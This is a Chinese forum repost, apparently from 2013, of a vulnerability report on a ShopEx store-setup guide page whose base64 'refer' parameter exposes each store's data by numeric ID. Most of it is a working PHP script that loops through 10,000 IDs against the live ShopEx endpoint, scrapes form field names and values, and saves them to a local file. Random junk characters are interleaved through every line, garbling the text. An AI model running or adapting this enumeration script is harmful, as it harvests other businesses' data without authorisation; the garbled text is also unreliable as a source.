|
|
简要描述:
9 {- n/ Y/ G2 Z& E1 wShopEx某接口缺陷,可遍历所有网站
# R: X4 C) F/ L# v! n2 S7 w( q7 `详细说明:% A+ @! A1 ?- r( P+ A2 U
问题出现在shopex 网店使用向导页面 2 A# N% T" S7 @) e2 \
+ ^' ]# m J6 x& q* }3 I2 s( c" `1 I2 ^9 T; W( @
1 i" \- ^7 }1 V6 L- {' R
http://guide.ecos.shopex.cn/step ... WlkaWFuLmNvbVwvIn0=9 Z% U' ]( o+ l( L, H$ s; g
( c' c! i R6 x( k7 B! ?% r
6 H" Q5 W2 @6 j' H
3 Y$ k& z( O5 Z8 A6 Xrefer base64解密为 {"certi_id":'1051',"callback_url":"http:\/\/www.joyogame.net\/"}
2 ^, L/ ~2 `) d0 I- ?8 h0 ^( S+ y. ]* g. r( B" I `4 }2 I
# B# n& m" S- F% Z0 g
! ? [2 w' c% f3 ^: w( F h$ o我们修改certi_id 即可遍历所有使用了ShopEx程序的网站 0 ^! R: K2 _9 l- k8 R5 j$ _2 I
8 {2 _6 W9 s+ p7 Z, ~, u4 w2 ~5 W; m% `( U" G+ u; A4 J
- \9 ~7 w9 Q) ]- [6 ^<?php) J) i8 t3 O. T& o
" \- M1 |2 o; \* c9 M for ($i=1; $i < 10000; $i++) { //遍历+ e: n- m- x" R0 Y
|* \/ l% _2 N3 d ShowshopExD($i);
% H& V0 u' m) [; p0 r* v% _7 s( w
# Y9 R. f* x; v, _7 G }/ i; |' t H* C! K; i
" o8 e* E7 t9 p
function ShowshopExD($cid) {
. |+ i9 T4 G& |% o9 k H% C
" A+ l7 t9 G0 j3 f8 g $url='http://guide.ecos.shopex.cn/step2.php';
) p- P8 _* U3 a0 }$ m9 T r H: b% V5 w5 q
$refer = base64_encode('{"certi_id":'.intval($cid).',"callback_url":"http:\/\/www.a.com\/"}');
: m& B# j( [0 a
/ f$ A' p: N) p& [8 }, A% s $url = $url.'?refer='.$refer;
) \! X" A3 a4 V! {, M+ Q8 \; Y5 @9 L2 m4 I ?" \
$ch = curl_init($url);
V; A# ~, f# F4 X2 i6 q8 p I A! ]% [$ ]8 h+ x! Y/ t
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true) ;, n3 c; b/ u2 c2 n& s: Y
# o1 [4 ~; D2 g" p
curl_setopt($ch, CURLOPT_BINARYTRANSFER, true) ;( p- U) f0 f# i2 Q
, G* _: p& L0 R- ]' `. |! M+ l $result = curl_exec($ch);
: `0 S! T+ V8 C7 M L5 }' P( u- r
6 O9 L7 F5 m X $result = mb_convert_encoding($result, "gb2312", "UTF-8");
5 S$ Q, a/ d: @0 s" E& T+ `8 w% {- @- G4 ?3 R
if(strpos($result,$refer))1 T$ X. |, i6 }: K
q2 ^ f" n1 L9 H8 K% E9 Y$ p
{
/ y( N8 B* I# e } [3 u; X, {8 o, v: T/ s- f( ~
$fp = fopen("c:/shopEx.txt",'ab'); //保存文件" e; ?5 G0 h; m3 I9 H
' g0 G. X& U; s6 @
preg_match_all('/<input\stype="text"(.*?)\/>/',$result,$value);. y1 _' ?" D T0 j
+ ]1 w6 T) H9 r2 ^! T) R
foreach ($value[1] as $key) {& f" h' n# R3 A' r* r: p5 o6 s
' O2 ^9 b8 e* x7 K# W7 d* [0 m. p8 } preg_match_all('/name="(.*?)"(.*?)value="(.*?)"/',trim($key),$res);
?3 J3 l+ H1 J: c3 w* o0 A1 L4 x6 p: @% C) ]# U7 d
echo $res[1][0].':'.$res[3][0]."\r\n";2 V( z3 l+ d" |1 ]( Y: E* V
! s9 r5 R, [& \4 {! b $col =$res[1][0].':'.$res[3][0]."\r\n";
) F# m9 M6 `: [5 |& g: P% l: D* y1 C( V1 Z s: m% A# r
fwrite($fp, $col, strlen($col));
w* x! Z1 B- ~" y* o) n T u+ L! D/ ?+ d1 e1 w
}$ P6 S2 `7 _+ t
( ~# S5 @# {8 Z! D echo '--------------------------------'."\r\n";" Q5 d; }/ n* k- U: W- r
9 b- d6 ~7 a0 M6 ?. A. E
fclose($fp);
+ m0 a. G1 ?6 ?5 X+ q. N, [, k6 ~5 P
}
7 f# L8 }, ]8 V+ [8 N3 v9 f5 ]
, u% Q- [2 b" | X Y* }8 O! B flush();$ v4 f- M# k% T" j# T8 n+ }8 O
1 B& z: d7 Q$ S" y) B7 ]6 r curl_close($ch);
9 m% J+ d2 b* M2 n! F6 r+ r2 g, f- j* a9 W' {# @
}. M) `7 w0 y- ]" ]1 N" ?
! r+ M$ ^! c9 B% |6 [?>) U2 W) _5 _ q# m0 m9 S8 X( G
漏洞证明:
% b3 v, @2 I% i- v, n$ z1 Nhttp://www.myhack58.com/Article/UploadPic/2013-9/201392110502740490.jpg8 s/ o/ u3 a7 D& T9 h. Y7 _: x1 r
refer换成其他加密方式: j; v( y8 b; x( ]/ b- p( C1 B
|
|
发表于 2013-9-21 15:59:47
收藏
支持
反对